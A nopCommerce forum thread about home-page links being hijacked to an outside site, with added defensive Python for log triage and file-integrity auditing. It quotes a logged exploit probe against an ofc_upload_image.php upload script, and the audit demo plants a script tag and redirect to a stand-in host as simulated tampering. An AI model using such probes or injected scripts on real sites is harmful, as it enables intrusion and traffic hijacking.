Fake URL injection in homepage - nop 3.00 site.

This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
10 years ago
Hello nop community,

I chose to post here (General Support) thinking I might not be the only one having this problem. So I kindly ask the forum admins/moderators to re-post it in the more appropriate forum, if it's not in the right one.
I do not suggest the problem described is related to any nopCommerce bug, but if it is in any way related to some kind of security issue not properly treated in code, I'm sure it might be helpful to investigate.


A few months ago I published a nop 3.00 website for selling print supplies. It's accessible at http://www.printsupplies.sbshop.ro
It worked wonderfully until a few days ago, when I found some changes I was unaware of.
I am writing this to any of you hoping someone could help me with any kind of suggestions about what I should do to restore the site to its nice functional state.

The environment
My website is hosted on a machine in my company. I set up everything myself: OS, SQL Server, website (nop installation) and any customization necessary.
I have stopped the WM-Remote management service, disabled any remote access to this machine I could think of (except for Website access of course) and generally adopted many of the Windows and SQL Server recommended security policies.
For any operation I need to do on this machine I log on locally and log off immediately after I'm done working.

The problem
I have on my home page 9 featured products. Normally, each of these products displays its picture in the FEATURED PRODUCTS section on the home page.
Each of these pictures has a link to their product page, and a link to their picture URL.
For example, my first featured product picture URL should be http://www.printsupplies.sbshop.ro/content/images/thumbs/0006440_bs0625b001aa_125.jpeg and clicking on it should open the page at http://www.printsupplies.sbshop.ro/en/bs0625b001aa, which is its corresponding product page.

The symptom:
From time to time I found that the featured product picture is missing and clicking on any of the empty picture frames of the featured products on the home page opens an unwanted webpage with a URL starting with http://www.baidu.com/... which mimics the Google search page in some Asian language (probably Chinese).
I was very surprised to see that for all my featured products the picture URL was somehow being changed to the URL of the unwanted odd Chinese page.
Also I found that from time to time the site seems to revert to its normal behavior without my intervention, which was quite dazzling, until I started to suspect some "guest" customer accounts for the whole problem. It seems that guest accounts get deleted automatically every 600 seconds...

Measures I took
1. First I searched all the website files for any containing "baidu.com" (domain part of the "fake" injected URL). No such file was found.
2. I searched many of the DB tables with the same query mask and found a few records in the GenericAttribute table. All these records seem to be "Last visited page" URLs of some guest accounts.
3. I deleted (from the administration web site) all guest customers. The result was that the problem seemed to disappear as if by miracle. Later I found that the problem re-appeared and is manifesting exactly the same.
4. I restored all website files from a backup that I took long before this problem manifested itself. The problem was gone, but re-appeared the next day.
5. I dug through a lot of nop source code, and unfortunately could not understand how this "bug" entered my system. In nop, these URLs are extracted in code from the database (where I didn't find any sign of the injected "fake" URL). It's like somehow some method calls get "redirected" to a different implementation containing some malign code. This code should be in a foreign DLL, but I didn't find any such file (yet?).
6. There is no longer "IP ban" support in nop 3.0. I would have tried to simply ban all the IPs of the "baidu.com" domain. I tried to find a plugin that could provide this "IP ban" function, but found none yet.
7. Finally I found the error message (see below) that I think might be related to the described problem, but I am not sure about that. I find the originating page URL (shown in the error message) intriguing.

Log level: Error
Short message: A potentially dangerous Request.Path value was detected from the client (&).
Full message: System.Web.HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&). at System.Web.HttpRequest.ValidateInputIfRequiredByConfig() at System.Web.HttpApplication.PipelineStepManager.ValidateHelper(HttpContext context)
IP address: 148.243.214.3
Customer: builtin@search_engine_record.com
Page URL: http://printsupplies.sbshop.ro/t/infopayment&sa=u&ei=64fauonho6mj4aslv4fq&ved=0ckmcebywutisag&usg=afqjcnfh8jh6vkoc-rrmkdkao3xkr6fruq/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=load.php
Referrer URL: (empty)
Created on: 9/23/2013 10:26:06 PM


I am very grateful to anyone that might help solve this problem.

Regards,
Sorin Solescu
10 years ago
ssolescu wrote:
The problem
I have on my home page 9 featured products. Normally, each of these products displays its picture in the FEATURED PRODUCTS section on the home page.
Each of these pictures has a link to their product page, and a link to their picture URL.
For example, my first featured product picture URL should be http://www.printsupplies.sbshop.ro/content/images/thumbs/0006440_bs0625b001aa_125.jpeg and clicking on it should open the page at http://www.printsupplies.sbshop.ro/en/bs0625b001aa, which is its corresponding product page.

Product URL itself cannot be modified to redirect to a third-party site. Hence I think that the only way to achieve it is injecting some JavaScript which will open a new URL instead of the default one. It could be done one of the following ways:
1. Modify cshtml files
2. Inject it into topic (HomePageText)
3. If you're using the default nivo slider plugin, then one of the slides (HTML of it) could contain java-script
4. Replace one of .js files on your server with a custom one

So the next time it happens, immediately make a database and website backup. Then check all of these points. Also save the home page (HTML, related files) to the file system. It could shed some light. Now... let's wait until it happens again.

P.S. I'm not an administrator. But I'm sure that there should be some tools which log ALL requests to a server. If you can make some debugging then (if you had some logs)
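On the point about logging all requests: IIS already writes a W3C extended log for every request, and the "Page URL" in the nop log entry above can be correlated against it. The following is an added example (not code from the thread or from nopCommerce) that parses a W3C log excerpt and flags requests whose path contains a character ASP.NET 4 rejects by default (`<`, `>`, `*`, `%`, `&`, `:`, `\`, `?`, the set that produced the "potentially dangerous Request.Path" error, `&` in this case) or that asks for a file type an ASP.NET MVC site never serves. The log lines are constructed for the example; the server IP, user agents and status code are assumptions, while the client IP and path are the ones quoted in the log entry earlier in the thread.

```python
import os
from collections import Counter

# Constructed IIS W3C log excerpt (not a real log from the site): two ordinary
# storefront requests and one request whose path contains '&' and names a .php
# file. Server IP, user agents and status codes are made up for the example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2013-09-23 22:25:50 10.0.0.5 GET /en/bs0625b001aa - 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.1) 200 46
2013-09-23 22:25:51 10.0.0.5 GET /content/images/thumbs/0006440_bs0625b001aa_125.jpeg - 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.1) 200 3
2013-09-23 22:26:06 10.0.0.5 GET /t/infopayment&sa=u&ei=64fauonho6mj4aslv4fq&ved=0ckmcebywutisag&usg=afqjcnfh8jh6vkoc-rrmkdkao3xkr6fruq/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php name=load.php 80 - 148.243.214.3 Mozilla/5.0 400 31
"""

# Characters ASP.NET 4 refuses in Request.Path by default (requestPathInvalidCharacters).
PATH_INVALID_CHARS = set('<>*%&:\\?')
# Resource types an ASP.NET MVC storefront does not serve; a request for one is a probe.
FOREIGN_EXTENSIONS = {".php", ".asp", ".cgi", ".pl"}


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the data lines that follow
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split(" ")  # IIS replaces spaces inside values with '+'
        if len(values) != len(fields):
            raise ValueError(f"field count mismatch: {line!r}")
        rows.append(dict(zip(fields, values)))
    return rows


def reasons_to_flag(row):
    """Return human-readable reasons a request deserves a look, or [] if none."""
    stem = row["cs-uri-stem"]
    reasons = []
    bad = sorted(PATH_INVALID_CHARS.intersection(stem))
    if bad:
        reasons.append("path contains " + "".join(bad))
    ext = os.path.splitext(stem.rsplit("/", 1)[-1])[1].lower()
    if ext in FOREIGN_EXTENSIONS:
        reasons.append(f"requests {ext} resource this site does not serve")
    return reasons


def triage(text):
    """Return (flagged requests as (client ip, path, reasons), per-client counts)."""
    flagged = []
    for row in parse_w3c(text):
        reasons = reasons_to_flag(row)
        if reasons:
            flagged.append((row["c-ip"], row["cs-uri-stem"], reasons))
    per_client = Counter(ip for ip, _, _ in flagged)
    return flagged, per_client


if __name__ == "__main__":
    for ip, path, reasons in triage(SAMPLE_LOG)[0]:
        print(ip, path, "; ".join(reasons))
```

Run it over the real `u_ex*.log` files from `%SystemDrive%\inetpub\logs\LogFiles` (the default IIS location) instead of `SAMPLE_LOG` to see which clients keep sending such paths and whether any of them coincide with the times the home page links change.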
10 years ago
Thank you Andrei for your quick and useful reply.

Indeed, it might be caused by altering some Java files.
I don't use the default NivoSlider. I replaced it with NivoSliderReloaded (downloaded from nop site).

The track to follow that you suggested is for sure a very good idea, and I thank you for it. I will definitely take a full snapshot of all related files when this problem appears again and browse file-by-file to find the altered one, if any.

For now I just don't understand how one could inject such a file into my machine. I was pretty confident about its safety.
I will post here any relevant findings following your advice. If positive, it might help others too.

Regards,
Sorin Solescu
10 years ago
ssolescu wrote:
browse file-by-file to find the altered one

Use WinMerge. It'll save you A LOT OF time
10 years ago
Thanks for the suggestion.
10 years ago
Here is a short description of the steps I took trying to solve this problem.
1.  I stopped (disabled) all the scheduled tasks (from Administration -> System -> Schedule tasks), so that the Guest accounts don't get deleted every 10 minutes.
Then I made a DB backup and I copied all the website files/folders to a reserved destination for analysis.
2.  I used WinMerge (thank you Andrei for the suggestion!) to find differences between the files/folders of the website (from the reserved location) and the content of the website files/folders as backed up some time ago, when the issue was not manifested.
All the files and folders were found to have identical content, except for some JPG files that are missing from the Content/Thumbs folder in the backup. I think this is irrelevant. It might be that I uploaded/imported some pictures after I took the backup.
3.  I looked into HomePageText topic in my database (tables Topic and LocalizedProperties).
I found no suspicious content here. It’s just a text that I put there.
4.  After restarting the server machine, the injected URL links disappeared and the correct ones were in their places. Initially I presumed that there is some kind of malign code attached to a Guest account and when that account was deleted by the scheduled task the code went inactive. This was when trying to explain why the problem appeared and disappeared from time to time. It seems I was wrong. Now the task scheduler doesn't run any task and still the issue disappeared after the machine restart.
I don't know what to do next, so with a lot of shame I started to contemplate the perspective of doing the most stupid thing of all: a full re-installation of the server, starting from the OS setup… this time closing all the unneeded TCP/IP ports.
Or maybe someone might have a better idea. I’d be very grateful !
These are the moments I regret not being a hairdresser instead…
Regards,
Sorin Solescu
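Andrei's four places to check (cshtml views, the HomePageText topic, slider HTML, replaced .js files) and the WinMerge comparison above are the same audit in two halves: "which files changed against a known-good copy" and "does any markup or script now reference a host that is not mine". The block below is an added example, not code from the thread or from nopCommerce, that does both with a SHA-256 manifest and a host allowlist. The web root, file names and the injected host `injected.example` are all constructed for the demonstration; nothing here was taken from the real site.

```python
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Matches absolute http(s) URLs in any text (views, topic HTML, slider HTML, .js).
URL_IN_TEXT = re.compile(r"https?://[^\s'\"<>]+", re.I)
# Matches the src of <script> tags, including protocol-relative '//host/x.js' forms
# that URL_IN_TEXT would miss.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def hash_tree(root):
    """Return {relative posix path: sha256 hex} for every file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def diff_manifests(baseline, current):
    """Compare two manifests from hash_tree(); report added, removed and changed paths."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "changed": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def find_external_hosts(text, allowed_hosts):
    """Return hosts referenced by URLs or script src attributes that are not allowlisted.

    Works on cshtml, stored topic/slider HTML exported from the database, or raw .js.
    Relative references (no host) are ignored; they stay on the site itself.
    """
    hosts = set()
    for candidate in URL_IN_TEXT.findall(text) + SCRIPT_SRC.findall(text):
        host = urlparse(candidate).hostname
        if host and host.lower() not in allowed_hosts:
            hosts.add(host.lower())
    return sorted(hosts)


def audit(root, baseline, allowed_hosts):
    """Hash the tree, diff it against the baseline, and scan every new/changed file."""
    delta = diff_manifests(baseline, hash_tree(root))
    suspects = {}
    for rel in delta["added"] + delta["changed"]:
        text = (Path(root) / rel).read_text(errors="replace")
        hosts = find_external_hosts(text, allowed_hosts)
        if hosts:
            suspects[rel] = hosts
    return delta, suspects


def demo():
    """Constructed end-to-end run on a throwaway web root, not the real site."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Views" / "Home").mkdir(parents=True)
        (root / "Scripts").mkdir()
        index = root / "Views" / "Home" / "Index.cshtml"
        index.write_text("<div class='home-page'>featured products go here</div>\n")
        (root / "Scripts" / "public.common.js").write_text("function nop() {}\n")
        baseline = hash_tree(root)  # taken while the site is known to be clean

        # Simulate tampering of the kind described in the thread: a script tag
        # appended to a view and one extra .js file dropped into Scripts.
        index.write_text(index.read_text() + "<script src='//injected.example/r.js'></script>\n")
        (root / "Scripts" / "extra.js").write_text("window.location='http://injected.example/';\n")

        return audit(root, baseline, {"www.printsupplies.sbshop.ro"})


if __name__ == "__main__":
    delta, suspects = demo()
    print(delta)
    print(suspects)
```

In practice, take the baseline manifest while the links are correct, keep it off the server, and rerun `audit()` the moment the home page links change; feed the same `find_external_hosts()` the HomePageText topic and the slider HTML exported from the database, since those never show up in a file comparison.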
10 years ago
Are you certain it's the NopCommerce site itself which is affected, rather than your own web-browser or malware on your computer altering the links?  Do you get the weird links when browsing from another computer or mobile device?

Nick
10 years ago
Hi Nick,

The problem is for sure not related to clients. I have obtained the same results while browsing from different machines, on different networks, even using different ISP routes and using different browsers (IE, Chrome, etc.). In my opinion clients are excluded.

One can not be absolutely sure that a server is 100% clean.

The machine serving this app has Win 2008 Web Server as OS, updated to the day.
It has an SQL 2008 R2 instance installed and the IIS has only one website – the nop 3.00 app.
I have closed a.s.a.p. (in Win Firewall) all remote access ports and disabled all remote access related services. I have even disabled IPv6… No other app was installed on this machine. Even the NET 4.5 framework (and many other required packages) were downloaded on a separate machine, scanned and then transferred to this machine to be deployed. I have never done any browsing from this machine. In short – I have tried my best to keep it save (I mean secured).
It is true that I didn’t deploy any fancy and expensive security apps (like Endpoint Security or similar), considering that the described measures are enough. Typical antivirus apps won’t run on Win Server OS.

On the server nothing else is going wrong. I have no problems recorded in the Windows logs (application log, system log, security log). There were some attempts to log in from the Internet on the machine, but the Guest user account is disabled and I have renamed the default Administrator account through Local Policy. I doubt a user login was successfully made from the Internet into this machine.

I tend to suspect some kind of JavaScript injected somewhere into my machine. I spent the last 10 hours trying to find something of this kind. Nothing until now.
What's most annoying is the fact that all app files are clean (have identical content with the original ones), I have no suspect apps installed and I still haven't found the "bug".

Do you have any suggestions on what to do?

Regards,
Sorin Solescu
10 years ago
Hi,

nopCommerce after logout can't refresh the page, please help.
10 years ago
Hi,

I am new to nopCommerce. nopCommerce is working fine on my local PC,
but there is a problem on the server: when I log in on the site, go to other pages and after that log out the user, the page cannot refresh.

Please help on it